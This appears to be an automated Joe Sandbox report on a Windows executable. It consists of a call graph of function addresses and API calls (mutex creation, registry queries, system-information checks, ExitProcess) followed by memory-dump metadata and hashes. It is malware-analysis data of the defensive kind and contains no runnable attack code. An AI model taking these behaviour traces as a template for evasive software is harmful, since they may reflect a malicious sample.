4ad17b RtlWakeAllConditionVariable 12533->12535 12778 499f44 12780 499f4c shared_ptr 12778->12780 12779 49a953 Sleep CreateMutexA 12782 49a98e 12779->12782 12780->12779 12781 49a01f shared_ptr 12780->12781 12403 493c47 12404 493c51 12403->12404 12407 493c5f 12404->12407 12410 4932d0 12404->12410 12405 493c68 12407->12405 12429 493810 12407->12429 12433 4ac6ac 12410->12433 12412 49336b 12439 4ac26a 12412->12439 12414 49333c __Mtx_unlock 12416 4ac26a 5 API calls 12414->12416 12417 493350 __floor_pentium4 12414->12417 12418 493377 12416->12418 12417->12407 12420 4ac6ac GetSystemTimePreciseAsFileTime 12418->12420 12419 493314 12419->12412 12419->12414 12436 4abd4c 12419->12436 12421 4933af 12420->12421 12422 4ac26a 5 API calls 12421->12422 12423 4933b6 __Cnd_broadcast 12421->12423 12422->12423 12424 4ac26a 5 API calls 12423->12424 12425 4933d7 __Mtx_unlock 12423->12425 12424->12425 12426 4ac26a 5 API calls 12425->12426 12427 4933eb 12425->12427 12428 49340e 12426->12428 12427->12407 12428->12407 12430 49381c 12429->12430 12484 492440 12430->12484 12443 4ac452 12433->12443 12435 4ac6b9 12435->12419 12460 4abb72 12436->12460 12438 4abd5c 12438->12419 12440 4ac292 12439->12440 12441 4ac274 12439->12441 12440->12440 12441->12440 12466 4ac297 12441->12466 12444 4ac4a8 12443->12444 12446 4ac47a __floor_pentium4 12443->12446 12444->12446 12449 4acf6b 12444->12449 12446->12435 12447 4ac4fd __Xtime_diff_to_millis2 12447->12446 12448 4acf6b _xtime_get GetSystemTimePreciseAsFileTime 12447->12448 12448->12447 12450 4acf7a 12449->12450 12452 4acf87 __aulldvrm 12449->12452 12450->12452 12453 4acf44 12450->12453 12452->12447 12456 4acbea 12453->12456 12457 4acbfb GetSystemTimePreciseAsFileTime 12456->12457 12458 4acc07 12456->12458 12457->12458 12458->12452 12461 4abb9c 12460->12461 12462 4acf6b _xtime_get GetSystemTimePreciseAsFileTime 12461->12462 12465 4abba4 __Xtime_diff_to_millis2 __floor_pentium4 12461->12465 12463 4abbcf __Xtime_diff_to_millis2 12462->12463 12464 4acf6b _xtime_get GetSystemTimePreciseAsFileTime 12463->12464 12463->12465 12464->12465 12465->12438 12469 492ae0 12466->12469 12468 4ac2ae Concurrency::cancel_current_task 12477 4abedf 12469->12477 12471 492aff 12471->12468 12472 492af4 __fassign 12472->12471 12473 4ca671 __fassign 4 API calls 12472->12473 12476 4c6ccc 12473->12476 12474 4c8bec __fassign 4 API calls 12475 4c6cf6 12474->12475 12476->12474 12480 4acc31 12477->12480 12481 4acc3f InitOnceExecuteOnce 12480->12481 12483 4abef2 12480->12483 12481->12483 12483->12472 12487 4ab5d6 12484->12487 12486 492472 12489 4ab5f1 Concurrency::cancel_current_task 12487->12489 12488 4c8bec __fassign 4 API calls 12491 4ab69f 12488->12491 12489->12488 12490 4ab658 __fassign __floor_pentium4 12489->12490 12490->12486 12602 49215a 12605 4ac6fc 12602->12605 12604 492164 12606 4ac70c 12605->12606 12607 4ac724 12605->12607 12606->12607 12609 4acfbe 12606->12609 12607->12604 12610 4accd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12609->12610 12611 4acfd0 12610->12611 12611->12606 12721 499adc 12722 499aea 12721->12722 12726 499afe shared_ptr 12721->12726 12723 49a917 12722->12723 12722->12726 12724 49a953 Sleep CreateMutexA 12723->12724 12725 49a98e 12724->12725 12727 495c10 6 API calls 12726->12727 12728 499b7c 12727->12728 12735 498b30 12728->12735 12730 499b8d 12731 495c10 6 API calls 12730->12731 12732 499cb1 12731->12732 12733 498b30 6 API calls 12732->12733 12734 499cc2 12733->12734 12736 498b7c 12735->12736 12737 495c10 6 API calls 12736->12737 12738 498b97 shared_ptr __floor_pentium4 12737->12738 12738->12730 13041 493f9f 13042 493fad 13041->13042 13043 493fb6 13041->13043 13044 492410 5 API calls 13042->13044 13044->13043 12783 492b10 12784 492b1a 12783->12784 12785 492b1c 12783->12785 12786 4ac26a 5 API calls 12785->12786 12787 492b22 12786->12787 13045 492b90 13046 492bce 13045->13046 13047 4ab7fb TpReleaseWork 13046->13047 13048 492bdb shared_ptr __floor_pentium4 13047->13048 12919 4a87d0 12920 4a882a __cftof 12919->12920 12926 4a9bb0 12920->12926 12924 4a88d9 std::_Throw_future_error 12925 4a886c __floor_pentium4 12939 4a9ef0 12926->12939 12928 4a9be5 12943 492ce0 12928->12943 12930 4a9c16 12952 4a9f70 12930->12952 12932 4a8854 12932->12925 12933 4943f0 12932->12933 12934 4abedf InitOnceExecuteOnce 12933->12934 12935 49440a 12934->12935 12936 494411 12935->12936 12937 4c6cbb 4 API calls 12935->12937 12936->12924 12938 494424 12937->12938 12940 4a9f0c 12939->12940 12941 4ac68b __Mtx_init_in_situ 2 API calls 12940->12941 12942 4a9f17 12941->12942 12942->12928 12944 492d1d 12943->12944 12945 4abedf InitOnceExecuteOnce 12944->12945 12946 492d46 12945->12946 12947 492d51 __floor_pentium4 12946->12947 12949 492d88 12946->12949 12957 4abef7 12946->12957 12947->12930 12950 492440 4 API calls 12949->12950 12951 492d9b 12950->12951 12951->12930 12956 4a9fef shared_ptr 12952->12956 12954 4aa03b 12954->12932 12955 4aa058 12956->12955 12970 4aa210 12956->12970 12958 4abf03 Concurrency::cancel_current_task 12957->12958 12959 4abf6a 12958->12959 12960 4abf73 12958->12960 12964 4abe7f 12959->12964 12961 492ae0 5 API calls 12960->12961 12963 4abf6f 12961->12963 12963->12949 12965 4acc31 InitOnceExecuteOnce 12964->12965 12966 4abe97 12965->12966 12967 4abe9e 12966->12967 12968 4c6cbb 4 API calls 12966->12968 12967->12963 12969 4abea7 12968->12969 12969->12963 12971 4aa290 12970->12971 12977 4a71d0 12971->12977 12973 4aa2cc shared_ptr 12974 4aa4be shared_ptr 12973->12974 12975 493ee0 3 API calls 12973->12975 12974->12954 12976 4aa4a6 12975->12976 12976->12954 12978 4a7211 12977->12978 12985 493970 12978->12985 12980 4a7446 __floor_pentium4 12980->12973 12981 4a72ad __cftof 12981->12980 12982 4ac68b __Mtx_init_in_situ 2 API calls 12981->12982 12983 4a7401 12982->12983 12990 492ec0 12983->12990 12986 4ac68b __Mtx_init_in_situ 2 API calls 12985->12986 12987 4939a7 12986->12987 12988 4ac68b __Mtx_init_in_situ 2 API calls 12987->12988 12989 4939e6 12988->12989 12989->12981 12991 492f7e GetCurrentThreadId 12990->12991 12992 492f06 12990->12992 12993 492f94 12991->12993 12994 492fef 12991->12994 12995 4ac6ac GetSystemTimePreciseAsFileTime 12992->12995 12993->12994 13000 4ac6ac GetSystemTimePreciseAsFileTime 12993->13000 12994->12980 12996 492f12 12995->12996 12997 49301e 12996->12997 13001 492f1d __Mtx_unlock 12996->13001 12998 4ac26a 5 API calls 12997->12998 12999 493024 12998->12999 13002 4ac26a 5 API calls 12999->13002 13003 492fb9 13000->13003 13001->12999 13004 492f6f 13001->13004 13002->13003 13005 4ac26a 5 API calls 13003->13005 13006 492fc0 __Mtx_unlock 13003->13006 13004->12991 13004->12994 13005->13006 13007 4ac26a 5 API calls 13006->13007 13008 492fd8 __Cnd_broadcast 13006->13008 13007->13008 13008->12994 13009 4ac26a 5 API calls 13008->13009 13010 49303c 13009->13010 13011 4ac6ac GetSystemTimePreciseAsFileTime 13010->13011 13020 493080 shared_ptr __Mtx_unlock 13011->13020 13012 4931c5 13013 4ac26a 5 API calls 13012->13013 13014 4931cb 13013->13014 13015 4ac26a 5 API calls 13014->13015 13016 4931d1 13015->13016 13017 4ac26a 5 API calls 13016->13017 13026 493193 __Mtx_unlock 13017->13026 13018 4931a7 __floor_pentium4 13018->12980 13019 4ac26a 5 API calls 13022 4931dd 13019->13022 13020->13012 13020->13014 13020->13018 13021 493132 GetCurrentThreadId 13020->13021 13021->13018 13023 49313b 13021->13023 13023->13018 13024 4ac6ac GetSystemTimePreciseAsFileTime 13023->13024 13027 49315f 13024->13027 13025 4abd4c GetSystemTimePreciseAsFileTime 13025->13027 13026->13018 13026->13019 13027->13012 13027->13016 13027->13025 13027->13026 12623 4ad111 12624 4ad122 12623->12624 12626 4ad12a 12624->12626 12627 4ad199 12624->12627 12628 4ad1c0 12627->12628 12629 4ad1a7 SleepConditionVariableCS 12627->12629 12628->12624 12629->12628 12301 49a856 12302 49a870 12301->12302 12303 49a892 shared_ptr 12301->12303 12302->12303 12304 49a94e 12302->12304 12307 49a8a0 12303->12307 12317 497d30 12303->12317 12308 49a953 Sleep CreateMutexA 12304->12308 12306 49a8ae 12306->12307 12309 497d30 7 API calls 12306->12309 12311 49a98e 12308->12311 12310 49a8b8 12309->12310 12310->12307 12312 497d30 7 API calls 12310->12312 12313 49a8c2 12312->12313 12313->12307 12314 497d30 7 API calls 12313->12314 12315 49a8cc 12314->12315 12315->12307 12316 497d30 7 API calls 12315->12316 12316->12307 12318 497d96 __cftof 12317->12318 12355 497ee8 shared_ptr __floor_pentium4 12318->12355 12356 495c10 12318->12356 12320 497dd2 12321 495c10 6 API calls 12320->12321 12323 497dff shared_ptr 12321->12323 12322 497ed3 GetNativeSystemInfo 12324 497ed7 12322->12324 12323->12322 12323->12324 12323->12355 12325 498019 12324->12325 12326 497f3f 12324->12326 12324->12355 12327 495c10 6 API calls 12325->12327 12328 495c10 6 API calls 12326->12328 12329 49804c 12327->12329 12330 497f67 12328->12330 12332 495c10 6 API calls 12329->12332 12331 495c10 6 API calls 12330->12331 12333 497f86 12331->12333 12334 49806b 12332->12334 12366 4c8bbe 12333->12366 12336 495c10 6 API calls 12334->12336 12337 4980a3 12336->12337 12338 495c10 6 API calls 12337->12338 12339 4980f4 12338->12339 12340 495c10 6 API calls 12339->12340 12341 498113 12340->12341 12342 495c10 6 API calls 12341->12342 12343 49814b 12342->12343 12344 495c10 6 API calls 12343->12344 12345 49819c 12344->12345 12346 495c10 6 API calls 12345->12346 12347 4981bb 12346->12347 12348 495c10 6 API calls 12347->12348 12349 4981f3 12348->12349 12350 495c10 6 API calls 12349->12350 12351 498244 12350->12351 12352 495c10 6 API calls 12351->12352 12353 498263 12352->12353 12354 495c10 6 API calls 12353->12354 12354->12355 12355->12306 12357 495c54 12356->12357 12369 494b30 12357->12369 12359 495d17 shared_ptr __floor_pentium4 12359->12320 12360 495c7b __cftof 12360->12359 12361 495da7 RegOpenKeyExA 12360->12361 12362 495e00 RegCloseKey 12361->12362 12363 495e26 12362->12363 12364 495ea6 shared_ptr __floor_pentium4 12363->12364 12365 495c10 4 API calls 12363->12365 12364->12320 12397 4c8868 12366->12397 12368 4c8bdc 12368->12355 12370 494b92 12369->12370 12371 494ce5 12369->12371 12370->12371 12373 4c6da6 12370->12373 12371->12360 12374 4c6db4 12373->12374 12375 4c6dc2 __fassign 12373->12375 12378 4c6d19 12374->12378 12375->12370 12379 4c690a __fassign 4 API calls 12378->12379 12380 4c6d2c 12379->12380 12383 4c6d52 12380->12383 12382 4c6d3d 12382->12370 12384 4c6d8f 12383->12384 12385 4c6d5f 12383->12385 12386 4cb67d 4 API calls 12384->12386 12388 4c6d6e __fassign 12385->12388 12389 4cb6a1 12385->12389 12386->12388 12388->12382 12390 4c690a __fassign 4 API calls 12389->12390 12392 4cb6be 12390->12392 12391 4cb6ce __floor_pentium4 12391->12388 12392->12391 12394 4cf1bf 12392->12394 12395 4c690a __fassign 4 API calls 12394->12395 12396 4cf1df __cftof __fassign __freea __floor_pentium4 12395->12396 12396->12391 12398 4c887a 12397->12398 12399 4c690a __fassign 4 API calls 12398->12399 12402 4c888f __cftof 12398->12402 12401 4c88bf 12399->12401 12400 4c6d52 4 API calls 12400->12401 12401->12400 12401->12402 12402->12368 12143 4c6629 12146 4c64c7 12143->12146 12147 4c64d5 __fassign 12146->12147 12148 4c6520 12147->12148 12151 4c652b 12147->12151 12150 4c652a 12157 4ca302 GetPEB 12151->12157 12153 4c6535 12154 4c653a GetPEB 12153->12154 12156 4c654a __fassign 12153->12156 12154->12156 12155 4c6562 ExitProcess 12156->12155 12158 4ca31c __fassign 12157->12158 12158->12153 12159 49b1a0 12160 49b1f2 12159->12160 12161 49b3ad CoInitialize 12160->12161 12162 49b3fa shared_ptr __floor_pentium4 12161->12162 12594 4920a0 12595 4ac68b __Mtx_init_in_situ 2 API calls 12594->12595 12596 4920ac 12595->12596 12631 494120 12632 49416a 12631->12632 12634 4941b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 12632->12634 12635 493ee0 12632->12635 12636 493f48 12635->12636 12640 493f1e 12635->12640 12637 493f58 12636->12637 12641 492c00 12636->12641 12637->12634 12640->12634 12642 492c0e 12641->12642 12648 4ab847 12642->12648 12644 492c42 12645 492c49 12644->12645 12654 492c80 12644->12654 12645->12634 12647 492c58 Concurrency::cancel_current_task 12649 4ab854 12648->12649 12653 4ab873 Concurrency::details::_Reschedule_chore 12648->12653 12657 4acb77 12649->12657 12651 4ab864 12651->12653 12659 4ab81e 12651->12659 12653->12644 12665 4ab7fb 12654->12665 12656 492cb2 shared_ptr 12656->12647 12658 4acb92 CreateThreadpoolWork 12657->12658 12658->12651 12660 4ab827 Concurrency::details::_Reschedule_chore 12659->12660 12663 4acdcc 12660->12663 12662 4ab841 12662->12653 12664 4acde1 TpPostWork 12663->12664 12664->12662 12666 4ab817 12665->12666 12667 4ab807 12665->12667 12666->12656 12667->12666 12669 4aca78 12667->12669 12670 4aca8d TpReleaseWork 12669->12670 12670->12666 12788 49af20 12789 49af63 12788->12789 12800 4c6660 12789->12800 12794 4c663f 4 API calls 12795 49af80 12794->12795 12796 4c663f 4 API calls 12795->12796 12797 49af98 __cftof 12796->12797 12806 4955f0 12797->12806 12799 49b04e shared_ptr __floor_pentium4 12801 4ca671 __fassign 4 API calls 12800->12801 12802 49af69 12801->12802 12803 4c663f 12802->12803 12804 4ca671 __fassign 4 API calls 12803->12804 12805 49af71 12804->12805 12805->12794 12807 495610 12806->12807 12809 495710 __floor_pentium4 12807->12809 12810 4922c0 12807->12810 12809->12799 12813 492280 12810->12813 12814 492296 12813->12814 12817 4c87f8 12814->12817 12820 4c7609 12817->12820 12819 4922a4 12819->12807 12821 4c7649 12820->12821 12824 4c7631 __cftof __floor_pentium4 12820->12824 12822 4c690a __fassign 4 API calls 12821->12822 12821->12824 12823 4c7661 12822->12823 12826 4c7bc4 12823->12826 12824->12819 12828 4c7bd5 12826->12828 12827 4c7be4 __cftof 12827->12824 12828->12827 12833 4c8168 12828->12833 12838 4c7dc2 12828->12838 12843 4c7de8 12828->12843 12853 4c7f36 12828->12853 12834 4c8178 12833->12834 12835 4c8171 12833->12835 12834->12828 12862 4c7b50 12835->12862 12837 4c8177 12837->12828 12839 4c7dcb 12838->12839 12840 4c7dd2 12838->12840 12841 4c7b50 4 API calls 12839->12841 12840->12828 12842 4c7dd1 12841->12842 12842->12828 12844 4c7e09 __cftof 12843->12844 12845 4c7def 12843->12845 12844->12828 12845->12844 12846 4c7f69 12845->12846 12848 4c7fa2 12845->12848 12851 4c7f77 12845->12851 12846->12851 12852 4c7f8b 12846->12852 12870 4c8241 12846->12870 12848->12852 12866 4c8390 12848->12866 12851->12852 12874 4c86ea 12851->12874 12852->12828 12854 4c7f4f 12853->12854 12855 4c7f69 12853->12855 12854->12855 12857 4c7fa2 12854->12857 12860 4c7f77 12854->12860 12856 4c8241 4 API calls 12855->12856 12855->12860 12861 4c7f8b 12855->12861 12856->12860 12858 4c8390 4 API calls 12857->12858 12857->12861 12858->12860 12859 4c86ea 4 API calls 12859->12861 12860->12859 12860->12861 12861->12828 12863 4c7b62 12862->12863 12864 4c8ab6 4 API calls 12863->12864 12865 4c7b85 12864->12865 12865->12837 12868 4c83ab 12866->12868 12867 4c83dd 12867->12851 12868->12867 12878 4cc88e 12868->12878 12871 4c825a 12870->12871 12885 4cd3c8 12871->12885 12873 4c830d 12873->12851 12873->12873 12876 4c875d __floor_pentium4 12874->12876 12877 4c8707 12874->12877 12875 4cc88e __cftof 4 API calls 12875->12877 12876->12852 12877->12875 12877->12876 12881 4cc733 12878->12881 12880 4cc8a6 12880->12867 12882 4cc743 12881->12882 12883 4c690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12882->12883 12884 4cc748 __cftof 12882->12884 12883->12884 12884->12880 12886 4cd3ee 12885->12886 12887 4cd3d8 __cftof 12885->12887 12886->12887 12888 4cd485 12886->12888 12889 4cd48a 12886->12889 12887->12873 12890 4cd4ae 12888->12890 12891 4cd4e4 12888->12891 12898 4ccbdf 12889->12898 12893 4cd4cc 12890->12893 12894 4cd4b3 12890->12894 12915 4ccef8 12891->12915 12911 4cd0e2 12893->12911 12904 4cd23e 12894->12904 12899 4ccbf1 12898->12899 12900 4c690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12899->12900 12901 4ccc05 12900->12901 12902 4ccef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12901->12902 12903 4ccc0d __alldvrm __cftof _strrchr 12901->12903 12902->12903 12903->12887 12906 4cd26c 12904->12906 12905 4cd2de 12907 4ccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12905->12907 12906->12905 12908 4cd2b7 12906->12908 12910 4cd2a5 12906->12910 12907->12910 12909 4cd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12908->12909 12909->12910 12910->12887 12912 4cd10f 12911->12912 12913 4cd14e 12912->12913 12914 4cd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12912->12914 12913->12887 12914->12913 12916 4ccf10 12915->12916 12917 4ccf75 12916->12917 12918 4ccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12916->12918 12917->12887 12918->12917 13028 493fe0 13029 494022 13028->13029 13030 49408c 13029->13030 13031 4940d2 13029->13031 13034 494035 __floor_pentium4 13029->13034 13035 4935e0 13030->13035 13032 493ee0 3 API calls 13031->13032 13032->13034 13036 493616 13035->13036 13037 492ce0 5 API calls 13036->13037 13040 49364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13036->13040 13038 49369e 13037->13038 13039 492c00 3 API calls 13038->13039 13038->13040 13039->13040 13040->13034 13049 499ba5 13050 499ba7 13049->13050 13051 495c10 6 API calls 13050->13051 13052 499cb1 13051->13052 13053 498b30 6 API calls 13052->13053 13054 499cc2 13053->13054 12744 499ab8 12746 499acc 12744->12746 12747 499b08 12746->12747 12748 495c10 6 API calls 12747->12748 12749 499b7c 12748->12749 12750 498b30 6 API calls 12749->12750 12751 499b8d 12750->12751 12752 495c10 6 API calls 12751->12752 12753 499cb1 12752->12753 12754 498b30 6 API calls 12753->12754 12755 499cc2 12754->12755 12612 492170 12613 4ac6fc InitializeCriticalSectionEx 12612->12613 12614 49217a 12613->12614 12615 49ad70 12616 49aec0 shared_ptr __floor_pentium4 12615->12616 12618 49addc shared_ptr 12615->12618 12618->12616 12619 4c8ab6 12618->12619 12620 4c8ad1 12619->12620 12621 4c8868 4 API calls 12620->12621 12622 4c8adb 12621->12622 12622->12618 12671 498d30 12672 498d7f 12671->12672 12673 495c10 6 API calls 12672->12673 12674 498d9a shared_ptr __floor_pentium4 12673->12674 12756 4942b0 12759 493ac0 12756->12759 12758 4942bb shared_ptr 12760 493af9 12759->12760 12762 4932d0 6 API calls 12760->12762 12763 493b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12760->12763 12764 493c38 12760->12764 12761 4932d0 6 API calls 12766 493c5f 12761->12766 12762->12764 12763->12758 12764->12761 12764->12766 12765 493c68 12765->12758 12766->12765 12767 493810 4 API calls 12766->12767 12768 493cdb 12767->12768 13055 4977b0 13056 4977f1 shared_ptr 13055->13056 13057 495c10 6 API calls 13056->13057 13059 497883 shared_ptr 13056->13059 13057->13059 13058 495c10 6 API calls 13061 4979e3 13058->13061 13059->13058 13060 497953 shared_ptr __floor_pentium4 13059->13060 13062 495c10 6 API calls 13061->13062 13063 497a15 shared_ptr 13062->13063 13064 495c10 6 API calls 13063->13064 13069 497aa5 shared_ptr __floor_pentium4 13063->13069 13065 497b7d 13064->13065 13066 495c10 6 API calls 13065->13066 13067 497ba0 13066->13067 13068 495c10 6 API calls 13067->13068 13068->13069 13070 4987b0 13071 4987b8 GetFileAttributesA 13070->13071 13072 4987b6 13070->13072 13073 4987c4 13071->13073 13072->13071 13074 4a47b0 13076 4a4eed 13074->13076 13075 4a4f59 shared_ptr __floor_pentium4 13076->13075 13077 497d30 7 API calls 13076->13077 13078 4a50ed 13077->13078 13113 498380 13078->13113 13080 4a5106 13081 495c10 6 API calls 13080->13081 13082 4a5155 13081->13082 13083 495c10 6 API calls 13082->13083 13084 4a5171 13083->13084 13119 499a00 13084->13119 13114 4983e5 __cftof 13113->13114 13115 495c10 6 API calls 13114->13115 13118 498403 shared_ptr __floor_pentium4 13114->13118 13116 498427 13115->13116 13117 495c10 6 API calls 13116->13117 13117->13118 13118->13080 13120 499a3f 13119->13120 13121 495c10 6 API calls 13120->13121 13122 499a47 13121->13122 13123 498b30 6 API calls 13122->13123 13124 499a58 13123->13124 12297 4987b2 12298 4987b8 GetFileAttributesA 12297->12298 12299 4987b6 12297->12299 12300 4987c4 12298->12300 12299->12298 12678 49a9f4 12687 499230 12678->12687 12680 49aa03 shared_ptr 12681 495c10 6 API calls 12680->12681 12686 49aab3 shared_ptr __floor_pentium4 12680->12686 12682 49aa65 12681->12682 12683 495c10 6 API calls 12682->12683 12684 49aa8d 12683->12684 12685 495c10 6 API calls 12684->12685 12685->12686 12691 499284 shared_ptr 12687->12691 12688 495c10 6 API calls 12688->12691 12689 499543 shared_ptr __floor_pentium4 12689->12680 12690 49944f shared_ptr 12690->12689 12692 495c10 6 API calls 12690->12692 12694 49979f shared_ptr 12690->12694 12691->12688 12691->12690 12692->12690 12693 4998b5 shared_ptr __floor_pentium4 12693->12680 12694->12693 12695 495c10 6 API calls 12694->12695 12696 499927 shared_ptr __floor_pentium4 12695->12696 12696->12680 12714 494276 12715 492410 5 API calls 12714->12715 12716 49427f 12715->12716
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,004C652A,?,?,?,?,?,004C7661), ref: 004C6566
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: b98aa52fe992efb4ae1b85c106701e81461762bf75ee60a125626ce6178adfd8
                                                                                                                                            • Instruction ID: 1d55aaa74cbbe7c2ce04a091ddb066aaab337ce89a98414ec5332d79a72680dc
                                                                                                                                            • Opcode Fuzzy Hash: b98aa52fe992efb4ae1b85c106701e81461762bf75ee60a125626ce6178adfd8
                                                                                                                                            • Instruction Fuzzy Hash: 7FE08C38042148BBDF65BB18D909E893B6AEB51789F11881AF8154A225CB39EE82C694
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1697150509.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4aa0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5a00c344413300bb684d3e43ddc72928254ad90e23648e53fc9a8449174e10fb
                                                                                                                                            • Instruction ID: 21a9eebf0406c6eaa2e102cf5cee103f2f88c3e45c3d0aacbb5b306f516fad7b
                                                                                                                                            • Opcode Fuzzy Hash: 5a00c344413300bb684d3e43ddc72928254ad90e23648e53fc9a8449174e10fb
                                                                                                                                            • Instruction Fuzzy Hash: 0501F97B20F155EDDA431EA84BA15FA7F3AFA167303304517E00B8BA42F75176B17251

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
